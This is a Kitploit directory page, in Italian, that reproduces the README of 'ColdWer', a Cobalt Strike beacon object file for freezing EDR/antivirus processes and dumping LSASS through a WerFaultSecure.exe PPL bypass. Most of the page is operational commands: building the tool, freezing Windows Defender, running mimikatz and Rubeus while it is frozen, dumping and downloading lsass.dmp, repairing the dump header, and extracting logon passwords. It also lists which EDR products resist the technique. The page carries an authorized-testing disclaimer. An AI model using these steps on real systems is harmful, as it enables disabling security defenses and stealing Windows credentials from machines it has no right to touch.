Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ColdWer — BOF di Cobalt Strike per congelare i processi EDR/AV e dumpare LSASS sfruttando il bypass PPL di WerFaultSecure.exe | Kitploit
Strumenti/GitHubGitHub/0xsh3llf1r3/coldwer
Escalation di PrivilegiExploitMovimento LateralePost-ExploitRed TeamingSviluppo Payload
GitHub0xsh3llf1r3/coldwer

ColdWer

BOF di Cobalt Strike per congelare i processi EDR/AV e dumpare LSASS sfruttando il bypass PPL di WerFaultSecure.exe

Vedi Repository
144236 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ColdWer
Una guerra fredda sul tuo endpoint.

Stars Forks License


🥶 ColdWer

ColdWer sfrutta il bypass PPL di WerFaultSecure.exe per congelare i processi EDR/AV e dumpare la memoria LSASS sui moderni sistemi Windows.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Congela il tuo EDR/AV. Estrai ciò che ti serve. Rimani freddo.


👤 Autore

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Crediti

Questo progetto si basa sulla ricerca di TwoSevenOneT (@TwoSevenOneT):

ProgettoDescrizione
EDR-FreezeTecnica originale di congelamento EDR
WSASSDump LSASS tramite WerFaultSecure

Tutto il merito delle tecniche sottostanti va a TwoSevenOneT.


🔥 Caratteristiche


🚀 Per Iniziare

📋 Prerequisiti

  • Cobalt Strike 4.x
  • Beacon ad alta integrità (Amministratore/SYSTEM)

💾 Installazione

  1. Clona il repository:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Carica lo script aggressor in Cobalt Strike:
  • Vai su Cobalt Strike → Script Manager
  • Clicca Load
  • Seleziona cw/coldwer.cna

📦 Compilazione dal Sorgente

root@kitploit:~
# Navigate to source directory
cd src/

# Compile BOF (requires MinGW)
make

# Or manually:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Download Rapido

  1. Vai alla sezione Releases
  2. Scarica coldwer.o e coldwer.cna
  3. Mettili entrambi nella stessa cartella
  4. Carica coldwer.cna in Cobalt Strike

🖥️ Utilizzo

❄️ Congela EDR/AV

root@kitploit:~
# Find Windows Defender PID
beacon> ps

# Freeze the process
beacon> cw-freeze 1337

# Execute your commands while EDR/AV is frozen
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Unfreeze when done
beacon> cw-unfreeze

🔓 Dump LSASS

root@kitploit:~

# Step 1: Upload Win8.1 WerFaultSecure.exe
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Step 2: Find LSASS PID
beacon> ps

# Step 3: Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Step 4: Download the dump
beacon> download C:\Windows\Temp\lsass.dmp

🔧 Dopo il Download

Modifica l'intestazione del file per ripristinare il formato minidump:

Originale (PNG)Cambia in (MDMP)
89 50 4E 474D 44 4D 50

Comandi per ripristinare l'intestazione:

MetodoComando
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Poi analizza con Mimikatz:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Comandi

ComandoDescrizione
cw-freeze <PID> [Path]Congela il processo
cw-unfreezeScongela il processo precedentemente congelato
cw-dump <PID> <Path>Dump della memoria LSASS

📝 Esempi

root@kitploit:~
# Freeze with default path
beacon> cw-freeze 1337

# Use custom WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Unfreeze when done
beacon> cw-unfreeze

✅ Target Supportati

TargetStato
Windows Defender (MsMpEng.exe)✅ Funziona
LSASS (lsass.exe)✅ Funziona
Altri processi PPL✅ Funziona

⚠️ Limitazioni

NON funziona contro EDR con autoprotezione in modalità kernel:

EDRStato
Elastic Endpoint❌ Bloccato
CrowdStrike Falcon❌ Bloccato
SentinelOne❌ Bloccato
Carbon Black❌ Bloccato

⚙️ Come Funziona

root@kitploit:~
1. 🚀 Avvia WerFaultSecure.exe come PPL (livello WinTcb)
                    ↓
2. 🎯 WerFaultSecure si collega al processo target
                    ↓
3. ⏸️  MiniDumpWriteDump sospende tutti i thread del target
                    ↓
4. 🥶 Sospendi WerFaultSecure stesso → Il target rimane congelato
                    ↓
5. ✅ Esegui i tuoi comandi (EDR/AV non vede nulla!)
                    ↓
6. 🔥 Termina WerFaultSecure → Il target si scongela

🔑 Perché WerFaultSecure di Win8.1?

VersioneOutput
Windows 10/11Solo dump crittografato
Windows 8.1Dump grezzo non crittografato

🔍 Risoluzione dei Problemi


⚖️ Disclaimer

root@kitploit:~
⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è pensato per:
- Test di penetrazione autorizzati
- Operazioni red team con autorizzazione scritta
- Ricerca sulla sicurezza in ambienti controllati

L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
L'accesso non autorizzato a sistemi informatici è illegale.

📜 Licenza

Licenza MIT - Vedi LICENSE


🥶 Rimani Freddo. Rimani Silenzioso. 🥶

⭐ Metti una stella a questo repository se lo trovi utile! ⭐

Scarica lo strumento
CaratteristicaDescrizione
❄️ CongelaMetti i processi EDR/AV in uno stato di coma
🔓 DumpEstrai la memoria LSASS bypassando PPL
🛡️ Bypass PPLSfrutta WerFaultSecure.exe a livello WinTcb
⚡ VeloceEsecuzione BOF inline
🎯 Controllo ManualeDecidi tu quando congelare e scongelare
ErroreCausaSoluzione
File non trovatoPercorso non validoControlla il percorso di WerFaultSecure.exe
Accesso negatoPrivilegi insufficientiEsegui come Amministratore/SYSTEM
Firma non validaBinario non firmatoUsa WerFaultSecure.exe correttamente firmato
Processo inesistentePID erratoVerifica il PID con il comando ps
Target protettoProtezione kernelL'EDR ha autoprotezione (non bypassabile)
Già congelatoStato bloccatoEsegui prima cw-unfreeze